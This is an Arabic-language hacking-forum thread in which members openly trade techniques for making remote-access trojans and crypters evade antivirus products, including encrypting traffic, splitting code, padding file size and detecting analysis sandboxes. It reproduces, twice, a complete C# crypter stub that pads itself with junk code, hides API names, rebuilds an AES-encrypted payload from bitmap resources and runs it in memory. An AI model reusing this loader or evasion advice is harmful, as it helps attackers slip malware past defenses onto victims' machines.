المشاركات اخر المواضيع الاكثر مشاهدة

En çok mesaj

Evil Coder

Beginner Hacker
إنضم
3 يونيو 2020
المشاركات
230
مستوى التفاعل
284
النقاط
63
نظام التشغيل
windows_10
Clean Downloader VB.NET
ممكن توضح هذه النقطة ؟؟
السوكت سوكت حتى لو كان بأبسط طريقة تتخيلها
الي يفرق معاك شي واحد البيانات المرسلة و المستلمة

هي العلة لان برمجيات الحماية تعترض packets و تحللها


اتمنى توضحلي الكلام حتى اتعلم منك اخي
يعني انتا يمكنك تقسيم اكواد السوكت علي مكاتب وكلاسات وفكشنات ايضا و تشفير البايت المرسله والمستلمه باي خورزميه معدله تكون صعب علي الحمايات فكها
 
  • اعجبني
التفاعلات: Story

Story

Plus Hacker
إنضم
25 مارس 2019
المشاركات
280
مستوى التفاعل
383
النقاط
63
Clean Downloader VB.NET
يعني انتا يمكنك تقسيم اكواد السوكت علي مكاتب وكلاسات وفكشنات ايضا و تشفير البايت المرسله والمستلمه باي خورزميه معدله تكون صعب علي الحمايات فكها
نعم اعرف لكن السوكت بحد ذاته ليس مكشوف
الداتا التي ترسلها هي المشكلة

تذكر زمان لما تغير مفتاح التقسيم في النجرات كيف يتم تخطي بعض الحمايات بسيرفر خام

العلة كلها في الداتا
لو تشفرها بطريقة مختلفة ثم ترسلها سوف تتغير كثير من الامور
و لو مررتها عن طريق بروتوكول مشفر لن يتم كشفها حتى لو كانت planText
 

Evil Coder

Beginner Hacker
إنضم
3 يونيو 2020
المشاركات
230
مستوى التفاعل
284
النقاط
63
نظام التشغيل
windows_10
Clean Downloader VB.NET
نعم اعرف لكن السوكت بحد ذاته ليس مكشوف
الداتا التي ترسلها هي المشكلة

تذكر زمان لما تغير مفتاح التقسيم في النجرات كيف يتم تخطي بعض الحمايات بسيرفر خام

العلة كلها في الداتا
لو تشفرها بطريقة مختلفة ثم ترسلها سوف تتغير كثير من الامور
و لو مررتها عن طريق بروتوكول مشفر لن يتم كشفها حتى لو كانت planText
هناك بعض الحمايات تكشف اكواد السوكت مع التحليل بلذات لو مبرمج علي منصه الدوت نت فكما تعرف هيا سهله في التحليل و الفحص

نعم هذا split وليس مفتاح البايتات المرسله
 
  • اعجبني
التفاعلات: Story

Story

Plus Hacker
إنضم
25 مارس 2019
المشاركات
280
مستوى التفاعل
383
النقاط
63
Clean Downloader VB.NET
هناك بعض الحمايات تكشف اكواد السوكت مع التحليل بلذات لو مبرمج علي منصه الدوت نت فكما تعرف هيا سهله في التحليل و الفحص

نعم هذا split وليس مفتاح البايتات المرسله
لم اقل مفتاح بايتات اخي لكن انا فقط اذكر لك دليل على انها تحلل الداتا و ليس الكود
لان الى وقت قريب كيف ما شفرت النجرات سوف تكشفك بسبب الداتا الخارجة و الداخلة منه (عندها عينة من الاوامر و اماكنها في النص)

ف السوكت هنا مجرد تطابق بايتات للملف لو انتشر في اجهزة كثيرة
انما الداتا هي التي لا تتغير
نفس الشكل في كل مكان
و مجرد ما غيرت مفتاح التقسيم صار شكل الداتا غير مألوف بعد (الداتا هنا planText) ف يسهل جداً مراقبتها و كتابة patern كشف لها
و كل هذا و انا لم المس السوكت و لم اغير فيه اي كود

حسب خبرتي البسيطة احمي الدتا و سوف يطول بقاء الملف في الجهاز (الملف هو السيرفر لكن قلت لملف لان السوكت يصلح لكل شي)
 

Evil Coder

Beginner Hacker
إنضم
3 يونيو 2020
المشاركات
230
مستوى التفاعل
284
النقاط
63
نظام التشغيل
windows_10
Clean Downloader VB.NET
لم اقل مفتاح بايتات اخي لكن انا فقط اذكر لك دليل على انها تحلل الداتا و ليس الكود
لان الى وقت قريب كيف ما شفرت النجرات سوف تكشفك بسبب الداتا الخارجة و الداخلة منه (عندها عينة من الاوامر و اماكنها في النص)

ف السوكت هنا مجرد تطابق بايتات للملف لو انتشر في اجهزة كثيرة
انما الداتا هي التي لا تتغير
نفس الشكل في كل مكان
و مجرد ما غيرت مفتاح التقسيم صار شكل الداتا غير مألوف بعد (الداتا هنا planText) ف يسهل جداً مراقبتها و كتابة patern كشف لها
و كل هذا و انا لم المس السوكت و لم اغير فيه اي كود

حسب خبرتي البسيطة احمي الدتا و سوف يطول بقاء الملف في الجهاز (الملف هو السيرفر لكن قلت لملف لان السوكت يصلح لكل شي)
انا فاهم قصدك اخي وكلامك صحيح الحل هوه تشفير البايت المرسل بباسورد حتي تكون صعب علي الحمايات قراءتها وكشف السيرفر
 
  • احببته
التفاعلات: Story

Story

Plus Hacker
إنضم
25 مارس 2019
المشاركات
280
مستوى التفاعل
383
النقاط
63
Clean Downloader VB.NET
انا فاهم قصدك اخي وكلامك صحيح الحل هوه تشفير البايت المرسل بباسورد حتي تكون صعب علي الحمايات قراءتها وكشف السيرفر
نعم اخي هذا حل من الحلول
لكن مع ذلك لنكون واضحين هذا الحل لن ينجح لوقتت طويل مع سوكت النجرات لان عينة المالوير منتشرة و تم تحليلها
لو كتبت سوكت بطريقتك الخاصة مثل ما تفضلت قسمته على كلاسات مثلا او حتى استخدمت طرق اتصال اخرى سوف تقضي على اي امل للحماية في كشفه
لفترة طويلة جداً , لكن تجنب نشر الخام بشكل عشوائي او تجربته على جهاز فيه برنامج حماية من اي نوع و امورك تمام ان شاء الله
 

Evil Coder

Beginner Hacker
إنضم
3 يونيو 2020
المشاركات
230
مستوى التفاعل
284
النقاط
63
نظام التشغيل
windows_10
Clean Downloader VB.NET
نعم اخي هذا حل من الحلول
لكن مع ذلك لنكون واضحين هذا الحل لن ينجح لوقتت طويل مع سوكت النجرات لان عينة المالوير منتشرة و تم تحليلها
لو كتبت سوكت بطريقتك الخاصة مثل ما تفضلت قسمته على كلاسات مثلا او حتى استخدمت طرق اتصال اخرى سوف تقضي على اي امل للحماية في كشفه
لفترة طويلة جداً , لكن تجنب نشر الخام بشكل عشوائي او تجربته على جهاز فيه برنامج حماية من اي نوع و امورك تمام ان شاء الله
نعم اخي هناك ملاين الافكار يمكن القيام بيها للتشفير

ونا انشاء الله في طريقي للتعديل علي برنامج RAT خاص بي قديم سوف يتم تطوير الاتصال وبعض الاشياء الاخري

وسوف تكون اول مشاركه هنا انشاء الله

2021-05-17_220516.png


2021-05-17_220540.png



2021-05-17_220557.png
 

Story

Plus Hacker
إنضم
25 مارس 2019
المشاركات
280
مستوى التفاعل
383
النقاط
63
Clean Downloader VB.NET
نعم اخي هناك ملاين الافكار يمكن القيام بيها للتشفير

ونا انشاء الله في طريقي للتعديل علي برنامج RAT خاص بي قديم سوف يتم تطوير الاتصال وبعض الاشياء الاخري

وسوف تكون اول مشاركه هنا انشاء الله

مشاهدة المرفق 1887

مشاهدة المرفق 1888


مشاهدة المرفق 1889
سوف يكون مختلف و فريد من نوعه انا واثق من ذلك اخي @Evil Coder
 

SAMPOP

V • I • P
إنضم
9 سبتمبر 2018
المشاركات
1,634
مستوى التفاعل
2,013
النقاط
113
العمر
21
Clean Downloader VB.NET
نتيجة ممتازة اخي سام
حسب تجربتي مع النود
القيمة Kryptic التي كشفها النود خاصة بنقطة الادخال عليك تشفيرها
اما عندما تستخدم الرانبي يكشفه بالقيمة Injector
الافيرا في كثير من المرات يكشف دوال فك التشفير بالاخص عندما استخدم AESDecrypt
الحل كان بتقسيم الاكواد على كلاسات وضع دالة الفك في AboutForm
ايضا جرب زيادة حجم السرفر PUMP لاكثر من 2 ميجا
تفضل ملف Data الذي يحتوي علي loader.txt المعدل
C#:
using System;
using System.Drawing;
using System.Threading;
using System.Resources;
using System.Reflection;
using System.Windows.Forms;
using Microsoft.VisualBasic;
using System.Drawing.Imaging;
using System.Collections.Generic;
using System.Security.Cryptography;
using System.Runtime.InteropServices;
using System.Runtime.CompilerServices;

%ASSEMBLYINFO%
public class ZKi{public void ehYgEdCDehwUwbZDjbq(){
sbyte wdIHKHRRqNZPUq =  42;
double MifhEDYJjnSBRXtbjJepBUxKMOwwe = 4.236608E+13;
if(MifhEDYJjnSBRXtbjJepBUxKMOwwe == 3.33683E-24){
MifhEDYJjnSBRXtbjJepBUxKMOwwe = Math.Pow(double.MinValue, double.MaxValue);
object ASMwxPgDEJECUHIkaURE;
ASMwxPgDEJECUHIkaURE = 4.576878E+11;
}ulong xxTgwNQRZYXyIKaCANlTCOTW = 58656529126664172;
int oZwAuFZkOc = 98715041;
if(oZwAuFZkOc == 850437){
oZwAuFZkOc = oZwAuFZkOc + 522561;
}float iWmJDWVHsPbQA = 1.201944E+28F;
short bfatITpaRilaA = -21047;
byte fZIcHxAFOl =  55;
byte EXgwBQwUaBdWIMNKGTGOCtQkpOGH =  107;
int IgdnlfFYtSufzF = 97;
if(IgdnlfFYtSufzF == 891205){
IgdnlfFYtSufzF = IgdnlfFYtSufzF + 147010;
}ushort wwjgVeMkPzuewPEyCFb = 58138;
byte gmsHkPUVCzccLIdekAlhdVLtipw =  63;
byte fAtAnXPnUXp =  224;
double ctdWuxuDIeSlDYzUuILlsEJltgpW = 4.197762E-17;
double ATNWERnIcwQ = 1.555786E-14;
ctdWuxuDIeSlDYzUuILlsEJltgpW = ATNWERnIcwQ / 3;
object iLFAKSDngyXsnJmOIJIVP;
iLFAKSDngyXsnJmOIJIVP = 7.198292E-39;short UkxRNonlDHqsHfIZFQEn = 30667;
byte RhmwGBdsZldn =  205;
float dQfKcZhnSUpQ = -8.126031E-13F;
int KLTGK = 894564;
if(KLTGK == 476814){
KLTGK = KLTGK + 284387;
}short DSShlM = 17093;
sbyte hqJTwBoKba =  -23;
sbyte EWlJEVyYELPho =  -121;
uint RGQXxDDWQetubyoWYjoW = 558956644;
sbyte LoEHTMfAQbkwGkXaupTACdWfx =  93;
sbyte MDMny =  117;
byte ZVcdYU =  144;
string TqOloCGKJ = "ItzjaDaNnoW";
double YRbznPBIAWSDCwUyafEO = 2433121;
double oLpVKPwn = -241.0302;
oLpVKPwn = Math.Sqrt(3);
YRbznPBIAWSDCwUyafEO = oLpVKPwn;
try{
int JhyGHzhgo = 4944614;
if(JhyGHzhgo == 19882){
JhyGHzhgo++;
}else{
JhyGHzhgo--;
Console.Write(JhyGHzhgo.ToString());
}
}catch(Exception ex){
MessageBox.Show(ex.Message);
}byte ISGAjXOJFYypVeDuS =  217;
string XLKwqNpfIHjXldZHC = "fpuKGbWNFIKTJIhJFWhj";
sbyte HJbXPAeSfWTkNM =  -92;
byte JzEhJx =  196;
double PEzdzqAJJMJIlyJND = 2.393891E-38;
while(PEzdzqAJJMJIlyJND == 1.485354E-06){
double LEoYmmZmKBtbzCLed = 8.992203E-14;
PEzdzqAJJMJIlyJND = LEoYmmZmKBtbzCLed * 2;
Console.ReadLine();
}short KJUS = 5471;
uint FqzmOAVPLsWiRxnN = 59;
ushort MSaWtWVWmA = 56465;
float huxKgNQFXeajFBHwVTmkkONpDUS = 5.066064E+34F;

}
}
namespace %VAR0%
{
    class %VAR1%
    {
        %METHODS%
        
        |private static object %VAR29%;|
        |private static Type %VAR30%
        {
            get { return Type.GetType("System.Byte[]"); }
        }|
        
        |private static Type %VAR32%
        {
            get { return Type.GetType("System.Int32"); }
        }|
                
        |static void Main(string[] %VAR2%)
        {
            
            
            %VAR24%();
            ResourceManager %VAR3% = %VAR25%();
            byte[] %VAR6% = new byte[0];
            for(int %VAR15% = 0; %VAR15% < %IMGNUM%; %VAR15%++)
            {
                Bitmap %VAR4% = (Bitmap)%VAR3%.GetObject("%IMGNAME%" + %VAR26%(%VAR15%));
                byte[] %VAR14% = %VAR11%(%VAR4%);
                %VAR16%(ref %VAR6%, %VAR6%.Length + %VAR14%.Length);
                %VAR28%(ref %VAR6%, %VAR14%);
            }
            
            byte[] %VAR5% = (byte[])Interaction.CallByName((Object)%VAR3%, "GetO+ject".Replace("+", "b"), CallType.Method,(Object) "%KEYNAME%");
            %VAR6% = %VAR9%(%VAR6%, %VAR5%);
            %VAR31%(ref %VAR6%);
            
            Assembly %VAR7% = %VAR23%(%VAR6%);
            %VAR22%((Assembly)%VAR29%, %VAR2%);
        }|
        
        |private static void %VAR31%(ref byte[] %VAR6%)
        {
            byte[] original = (byte[])%VAR6%.Clone();
            for(int %VAR15% = 0; %VAR15% < %VAR6%.Length; %VAR15%++)
                %VAR6%[%VAR15%] = original[original.Length - 1 - %VAR15%];
        }|
        
        |private static void %VAR28%(ref byte[] %VAR6%, byte[] %VAR14%)
        {
            for(int %VAR15% = %VAR6%.Length - %VAR14%.Length; %VAR15% < %VAR6%.Length; %VAR15%++)
                %VAR6%[%VAR15%] = %VAR14%[%VAR15% - %VAR6%.Length + %VAR14%.Length];
        }|

        |private static void %VAR24%()
        {
            foreach(MethodInfo %VAR8% in Type.GetType("System.Threading.Thread").GetMethods())
                if(Interaction.CallByName(%VAR8%, "Name", CallType.Get).ToString() == "Sleep")
                    if(%VAR8%.GetParameters().Length == 1)
                        if(%VAR33%(%VAR8%).Equals(%VAR32%))
                            %VAR8%.Invoke(null, new object[] { %SLEEPTIME% });
        }|
        
        |private static Assembly %VAR23%(byte[] %VAR6%)
        {
            foreach(MethodInfo %VAR8% in Type.GetType("System.Reflection.Assembly").GetMethods())
                if(Interaction.CallByName(%VAR8%, "Name", CallType.Get).ToString() == "Lo+d".Replace("+", "a"))
                    if(%VAR8%.GetParameters().Length == 1)
                        if(%VAR33%(%VAR8%).Equals(%VAR30%))
                        {
                            %VAR29% = %VAR8%.Invoke(null, new object[] { %VAR6% });
                            return (Assembly)%VAR8%.Invoke(null, new object[] { %VAR6% });
                        }
            return null;
        }|
        
        |private static Type %VAR33%(MethodInfo %VAR8%)
        {
            return (Type)Interaction.CallByName(%VAR34%(%VAR8%)[0], "ParameterType", CallType.Get);
        }|
        
        |private static ParameterInfo[] %VAR34%(MethodInfo %VAR8%)
        {
            return (ParameterInfo[])Interaction.CallByName(%VAR8%, "GetParameters", CallType.Method);
        }|
        
        |private static string %VAR26%(int %VAR15%)
        {
            return %VAR15%.ToString();
        }|
        
        |public static void %VAR22%(Assembly %VAR7%, string[] %VAR2%)
        {
            %VAR21%(%VAR7%).Invoke(null, new object[] { %VAR2% });           
        }|
        
        |private static MethodInfo %VAR21%(Assembly %VAR7%)
        {
            return %VAR7%.EntryPoint;
        }|
        
        |private static Assembly %VAR19%()
        {
            Type t = Type.GetType("System.Type");
            PropertyInfo %VAR20% = t.GetProperty("Assembly");
            return (Assembly)%VAR20%.GetValue(typeof(%VAR1%), null);
        }|
        
        |private static ResourceManager %VAR25%()
        {
            return new ResourceManager("%RESNAME%", %VAR19%());
        }|
        
        |private static void %VAR16%(ref byte[] %VAR6%, int %VAR17%)
        {
            byte[] %VAR18% = (byte[])%VAR6%.Clone();
            %VAR6% = new byte[%VAR17%];
            Array.Copy(%VAR18%, 0, %VAR6%, 0, %VAR18%.Length);
        }|
        
        |private static byte[] %VAR9%(byte[] %VAR6%, byte[] %VAR5%)
        {
            RijndaelManaged %VAR10% = new RijndaelManaged();
            %VAR10%.Key = %VAR5%;
            return %VAR10%.CreateDecryptor().TransformFinalBlock(%VAR6%, 0, %VAR6%.Length);
        }|
        
        |private static IntPtr %VAR27%(IntPtr ptr)
        {
            return (IntPtr)((int)ptr + 4);
        }|

        |private static int %VAR35%(byte[] %VAR6%)
        {
            int %VAR13% = 0;
            for(int %VAR15% = 0; %VAR15% < 4; %VAR15%++)
                %VAR13% += %VAR6%[%VAR15%] * (int)Math.Pow(256, %VAR15%);
            return %VAR13%;
        }|

        |private static byte[] %VAR11%(Bitmap %VAR4%)
        {
            BitmapData %VAR12% = %VAR4%.LockBits(new Rectangle(0, 0, %VAR4%.Width, %VAR4%.Height), ImageLockMode.ReadOnly, %VAR4%.PixelFormat);
            byte[] %VAR13% = new byte[4];
            Marshal.Copy(%VAR12%.Scan0, %VAR13%, 0, 4);
            %VAR13% = new byte[%VAR35%(%VAR13%)];
            Marshal.Copy(%VAR27%(%VAR12%.Scan0), %VAR13%, 0, %VAR13%.Length);
            return %VAR13%;
        }|
    }
    
}
و هو الستب و العمل كله عليه
الان اصبح مكشوف من 3 حمايات و لم اعرف التعامل مع النود و الافيرا انطلاقا من المستند النصي loader.txt و ربما انت تستطيع تخطيهم لاني سوف انتقل الي برنامج تشفير اخر
هذه هي اكواد loader.txt المعدل
 

titanium

Plus Hacker
إنضم
15 يوليو 2019
المشاركات
317
مستوى التفاعل
410
النقاط
63
العمر
31
Clean Downloader VB.NET
تفضل ملف Data الذي يحتوي علي loader.txt المعدل
C#:
using System;
using System.Drawing;
using System.Threading;
using System.Resources;
using System.Reflection;
using System.Windows.Forms;
using Microsoft.VisualBasic;
using System.Drawing.Imaging;
using System.Collections.Generic;
using System.Security.Cryptography;
using System.Runtime.InteropServices;
using System.Runtime.CompilerServices;

%ASSEMBLYINFO%
public class ZKi{public void ehYgEdCDehwUwbZDjbq(){
sbyte wdIHKHRRqNZPUq =  42;
double MifhEDYJjnSBRXtbjJepBUxKMOwwe = 4.236608E+13;
if(MifhEDYJjnSBRXtbjJepBUxKMOwwe == 3.33683E-24){
MifhEDYJjnSBRXtbjJepBUxKMOwwe = Math.Pow(double.MinValue, double.MaxValue);
object ASMwxPgDEJECUHIkaURE;
ASMwxPgDEJECUHIkaURE = 4.576878E+11;
}ulong xxTgwNQRZYXyIKaCANlTCOTW = 58656529126664172;
int oZwAuFZkOc = 98715041;
if(oZwAuFZkOc == 850437){
oZwAuFZkOc = oZwAuFZkOc + 522561;
}float iWmJDWVHsPbQA = 1.201944E+28F;
short bfatITpaRilaA = -21047;
byte fZIcHxAFOl =  55;
byte EXgwBQwUaBdWIMNKGTGOCtQkpOGH =  107;
int IgdnlfFYtSufzF = 97;
if(IgdnlfFYtSufzF == 891205){
IgdnlfFYtSufzF = IgdnlfFYtSufzF + 147010;
}ushort wwjgVeMkPzuewPEyCFb = 58138;
byte gmsHkPUVCzccLIdekAlhdVLtipw =  63;
byte fAtAnXPnUXp =  224;
double ctdWuxuDIeSlDYzUuILlsEJltgpW = 4.197762E-17;
double ATNWERnIcwQ = 1.555786E-14;
ctdWuxuDIeSlDYzUuILlsEJltgpW = ATNWERnIcwQ / 3;
object iLFAKSDngyXsnJmOIJIVP;
iLFAKSDngyXsnJmOIJIVP = 7.198292E-39;short UkxRNonlDHqsHfIZFQEn = 30667;
byte RhmwGBdsZldn =  205;
float dQfKcZhnSUpQ = -8.126031E-13F;
int KLTGK = 894564;
if(KLTGK == 476814){
KLTGK = KLTGK + 284387;
}short DSShlM = 17093;
sbyte hqJTwBoKba =  -23;
sbyte EWlJEVyYELPho =  -121;
uint RGQXxDDWQetubyoWYjoW = 558956644;
sbyte LoEHTMfAQbkwGkXaupTACdWfx =  93;
sbyte MDMny =  117;
byte ZVcdYU =  144;
string TqOloCGKJ = "ItzjaDaNnoW";
double YRbznPBIAWSDCwUyafEO = 2433121;
double oLpVKPwn = -241.0302;
oLpVKPwn = Math.Sqrt(3);
YRbznPBIAWSDCwUyafEO = oLpVKPwn;
try{
int JhyGHzhgo = 4944614;
if(JhyGHzhgo == 19882){
JhyGHzhgo++;
}else{
JhyGHzhgo--;
Console.Write(JhyGHzhgo.ToString());
}
}catch(Exception ex){
MessageBox.Show(ex.Message);
}byte ISGAjXOJFYypVeDuS =  217;
string XLKwqNpfIHjXldZHC = "fpuKGbWNFIKTJIhJFWhj";
sbyte HJbXPAeSfWTkNM =  -92;
byte JzEhJx =  196;
double PEzdzqAJJMJIlyJND = 2.393891E-38;
while(PEzdzqAJJMJIlyJND == 1.485354E-06){
double LEoYmmZmKBtbzCLed = 8.992203E-14;
PEzdzqAJJMJIlyJND = LEoYmmZmKBtbzCLed * 2;
Console.ReadLine();
}short KJUS = 5471;
uint FqzmOAVPLsWiRxnN = 59;
ushort MSaWtWVWmA = 56465;
float huxKgNQFXeajFBHwVTmkkONpDUS = 5.066064E+34F;

}
}
namespace %VAR0%
{
    class %VAR1%
    {
        %METHODS%
       
        |private static object %VAR29%;|
        |private static Type %VAR30%
        {
            get { return Type.GetType("System.Byte[]"); }
        }|
       
        |private static Type %VAR32%
        {
            get { return Type.GetType("System.Int32"); }
        }|
               
        |static void Main(string[] %VAR2%)
        {
           
           
            %VAR24%();
            ResourceManager %VAR3% = %VAR25%();
            byte[] %VAR6% = new byte[0];
            for(int %VAR15% = 0; %VAR15% < %IMGNUM%; %VAR15%++)
            {
                Bitmap %VAR4% = (Bitmap)%VAR3%.GetObject("%IMGNAME%" + %VAR26%(%VAR15%));
                byte[] %VAR14% = %VAR11%(%VAR4%);
                %VAR16%(ref %VAR6%, %VAR6%.Length + %VAR14%.Length);
                %VAR28%(ref %VAR6%, %VAR14%);
            }
           
            byte[] %VAR5% = (byte[])Interaction.CallByName((Object)%VAR3%, "GetO+ject".Replace("+", "b"), CallType.Method,(Object) "%KEYNAME%");
            %VAR6% = %VAR9%(%VAR6%, %VAR5%);
            %VAR31%(ref %VAR6%);
           
            Assembly %VAR7% = %VAR23%(%VAR6%);
            %VAR22%((Assembly)%VAR29%, %VAR2%);
        }|
       
        |private static void %VAR31%(ref byte[] %VAR6%)
        {
            byte[] original = (byte[])%VAR6%.Clone();
            for(int %VAR15% = 0; %VAR15% < %VAR6%.Length; %VAR15%++)
                %VAR6%[%VAR15%] = original[original.Length - 1 - %VAR15%];
        }|
       
        |private static void %VAR28%(ref byte[] %VAR6%, byte[] %VAR14%)
        {
            for(int %VAR15% = %VAR6%.Length - %VAR14%.Length; %VAR15% < %VAR6%.Length; %VAR15%++)
                %VAR6%[%VAR15%] = %VAR14%[%VAR15% - %VAR6%.Length + %VAR14%.Length];
        }|

        |private static void %VAR24%()
        {
            foreach(MethodInfo %VAR8% in Type.GetType("System.Threading.Thread").GetMethods())
                if(Interaction.CallByName(%VAR8%, "Name", CallType.Get).ToString() == "Sleep")
                    if(%VAR8%.GetParameters().Length == 1)
                        if(%VAR33%(%VAR8%).Equals(%VAR32%))
                            %VAR8%.Invoke(null, new object[] { %SLEEPTIME% });
        }|
       
        |private static Assembly %VAR23%(byte[] %VAR6%)
        {
            foreach(MethodInfo %VAR8% in Type.GetType("System.Reflection.Assembly").GetMethods())
                if(Interaction.CallByName(%VAR8%, "Name", CallType.Get).ToString() == "Lo+d".Replace("+", "a"))
                    if(%VAR8%.GetParameters().Length == 1)
                        if(%VAR33%(%VAR8%).Equals(%VAR30%))
                        {
                            %VAR29% = %VAR8%.Invoke(null, new object[] { %VAR6% });
                            return (Assembly)%VAR8%.Invoke(null, new object[] { %VAR6% });
                        }
            return null;
        }|
       
        |private static Type %VAR33%(MethodInfo %VAR8%)
        {
            return (Type)Interaction.CallByName(%VAR34%(%VAR8%)[0], "ParameterType", CallType.Get);
        }|
       
        |private static ParameterInfo[] %VAR34%(MethodInfo %VAR8%)
        {
            return (ParameterInfo[])Interaction.CallByName(%VAR8%, "GetParameters", CallType.Method);
        }|
       
        |private static string %VAR26%(int %VAR15%)
        {
            return %VAR15%.ToString();
        }|
       
        |public static void %VAR22%(Assembly %VAR7%, string[] %VAR2%)
        {
            %VAR21%(%VAR7%).Invoke(null, new object[] { %VAR2% });          
        }|
       
        |private static MethodInfo %VAR21%(Assembly %VAR7%)
        {
            return %VAR7%.EntryPoint;
        }|
       
        |private static Assembly %VAR19%()
        {
            Type t = Type.GetType("System.Type");
            PropertyInfo %VAR20% = t.GetProperty("Assembly");
            return (Assembly)%VAR20%.GetValue(typeof(%VAR1%), null);
        }|
       
        |private static ResourceManager %VAR25%()
        {
            return new ResourceManager("%RESNAME%", %VAR19%());
        }|
       
        |private static void %VAR16%(ref byte[] %VAR6%, int %VAR17%)
        {
            byte[] %VAR18% = (byte[])%VAR6%.Clone();
            %VAR6% = new byte[%VAR17%];
            Array.Copy(%VAR18%, 0, %VAR6%, 0, %VAR18%.Length);
        }|
       
        |private static byte[] %VAR9%(byte[] %VAR6%, byte[] %VAR5%)
        {
            RijndaelManaged %VAR10% = new RijndaelManaged();
            %VAR10%.Key = %VAR5%;
            return %VAR10%.CreateDecryptor().TransformFinalBlock(%VAR6%, 0, %VAR6%.Length);
        }|
       
        |private static IntPtr %VAR27%(IntPtr ptr)
        {
            return (IntPtr)((int)ptr + 4);
        }|

        |private static int %VAR35%(byte[] %VAR6%)
        {
            int %VAR13% = 0;
            for(int %VAR15% = 0; %VAR15% < 4; %VAR15%++)
                %VAR13% += %VAR6%[%VAR15%] * (int)Math.Pow(256, %VAR15%);
            return %VAR13%;
        }|

        |private static byte[] %VAR11%(Bitmap %VAR4%)
        {
            BitmapData %VAR12% = %VAR4%.LockBits(new Rectangle(0, 0, %VAR4%.Width, %VAR4%.Height), ImageLockMode.ReadOnly, %VAR4%.PixelFormat);
            byte[] %VAR13% = new byte[4];
            Marshal.Copy(%VAR12%.Scan0, %VAR13%, 0, 4);
            %VAR13% = new byte[%VAR35%(%VAR13%)];
            Marshal.Copy(%VAR27%(%VAR12%.Scan0), %VAR13%, 0, %VAR13%.Length);
            return %VAR13%;
        }|
    }
   
}
و هو الستب و العمل كله عليه
الان اصبح مكشوف من 3 حمايات و لم اعرف التعامل مع النود و الافيرا انطلاقا من المستند النصي loader.txt و ربما انت تستطيع تخطيهم لاني سوف انتقل الي برنامج تشفير اخر
هذه هي اكواد loader.txt المعدل

اعتقد قلت لي انك عدلت على البرنامج وحذف Confuser ...
ارسل لي السورس المعدل ان امكن
لاني لا استطيع تشغيل الستب بهذه الطريقة
بخصوص الافيرا فشلت في تخطيه بواسطة برامج التشفير لانه يلزم اضافة فورم ولا اعرف طريقة اضافتها عبر codedom
لكن اتخطاه عند التشفير اليدوي
 

titanium

Plus Hacker
إنضم
15 يوليو 2019
المشاركات
317
مستوى التفاعل
410
النقاط
63
العمر
31
Clean Downloader VB.NET
نعم اخي هناك ملاين الافكار يمكن القيام بيها للتشفير

ونا انشاء الله في طريقي للتعديل علي برنامج RAT خاص بي قديم سوف يتم تطوير الاتصال وبعض الاشياء الاخري

وسوف تكون اول مشاركه هنا انشاء الله

مشاهدة المرفق 1887

مشاهدة المرفق 1888


مشاهدة المرفق 1889
اعجبني جدا التصميم
وواضح انه برنامج متعوب عليه
متشوق جدا لاستعماله
ارجوا ان لا يطول الامر.
ما ذا تقصد ب Anti Any run ؟ هل هي نفسها Bot killer
اهم شيء اضافة نوع كرت الشاشة عند الضحية وتحميل السيرفر من خلال رابط و TCP Connection List وان امكن اظهار نسخة .NET
 

SAMPOP

V • I • P
إنضم
9 سبتمبر 2018
المشاركات
1,634
مستوى التفاعل
2,013
النقاط
113
العمر
21
Clean Downloader VB.NET
اعتقد قلت لي انك عدلت على البرنامج وحذف Confuser ...
ارسل لي السورس المعدل ان امكن
لاني لا استطيع تشغيل الستب بهذه الطريقة
بخصوص الافيرا فشلت في تخطيه بواسطة برامج التشفير لانه يلزم اضافة فورم ولا اعرف طريقة اضافتها عبر codedom
لكن اتخطاه عند التشفير اليدوي
تفضل المشروع المعدل
الستب و المتمثل في loader.txt يحتوي علي 75 % من اكواد للتمويه فقط لقد ازلتها كلها تقريبا
 

Evil Coder

Beginner Hacker
إنضم
3 يونيو 2020
المشاركات
230
مستوى التفاعل
284
النقاط
63
نظام التشغيل
windows_10
Clean Downloader VB.NET
اعجبني جدا التصميم
وواضح انه برنامج متعوب عليه
متشوق جدا لاستعماله
ارجوا ان لا يطول الامر.
ما ذا تقصد ب Anti Any run ؟ هل هي نفسها Bot killer
اهم شيء اضافة نوع كرت الشاشة عند الضحية وتحميل السيرفر من خلال رابط و TCP Connection List وان امكن اظهار نسخة .NET
anti Anyrun هيا وظيفتها التحقق من خلال موقع ان الجهاز الذي يعمل عليه السيرفر host للفحص او rdp ام لا حتي نتجنب سحابات الفحص وهذه الاشياء
كل المعلومات موجود في Informations في اول خيار
انشاء الله عن قريب فانا الان اعمل علي مشاريع اخري مطلوبه مني عندما انتهي سوف ادخل علي هذا المشروع
 
  • ادهشني
التفاعلات: Story

SAMPOP

V • I • P
إنضم
9 سبتمبر 2018
المشاركات
1,634
مستوى التفاعل
2,013
النقاط
113
العمر
21
Clean Downloader VB.NET
نعم معك , لو صنعت رات جيد باتصال مشفر وقللت الاكواد داخل Stub وصعنت Plugins جديده فقط ضع الاشياء الاساسيه فقط علي الاقلل سوف ينكشف بعد مده كبيره جدا وسوف تلاحظ كلامي عن تجراب - يعني بلنسبه للخورزميات يمكنك التعديل علي الفكشن الخاص بها والتغير في شكل ناتج الخورزميه ونقاط الاداخال قم بتقسمها علي مجموعه من الكلاسات او ضيفها في مكتبه خارجيه وايضا قم بتفسيمها علي كلاسات في المكتبه
وبلتوفيق اخي سامبوب 🥰
لقد طرحت هنا في المنتدي سابقا برنامج اختراق جديد خاص بي و لقد رجعت للعمل عليه مرة اخري
هو يتخطي الافاست بسيرفر خام و التبليغ خارجي
و كذلك طرحت برنامج تشفير كلين في المنتدي و بعدما انكشف ارجعته كلين مرة اخري
لذلك تجدني غير مهتم كثيرا بالتشفير و خاصة اني لا اخترق
 

titanium

Plus Hacker
إنضم
15 يوليو 2019
المشاركات
317
مستوى التفاعل
410
النقاط
63
العمر
31
Clean Downloader VB.NET
تفضل المشروع المعدل
الستب و المتمثل في loader.txt يحتوي علي 75 % من اكواد للتمويه فقط لقد ازلتها كلها تقريبا
للاسف تعديله معقد جدا ويحتاج اعادة كتابة Functions(%VAR%) من جديد
لا جدوى من اعادة تشفيره . اخذ مني الكثير من الوقت دون فائدة وافضل كتابة برنامج جديدة على تعديله :)
 

titanium

Plus Hacker
إنضم
15 يوليو 2019
المشاركات
317
مستوى التفاعل
410
النقاط
63
العمر
31
Clean Downloader VB.NET
لقد طرحت هنا في المنتدي سابقا برنامج اختراق جديد خاص بي و لقد رجعت للعمل عليه مرة اخري
هو يتخطي الافاست بسيرفر خام و التبليغ خارجي
و كذلك طرحت برنامج تشفير كلين في المنتدي و بعدما انكشف ارجعته كلين مرة اخري
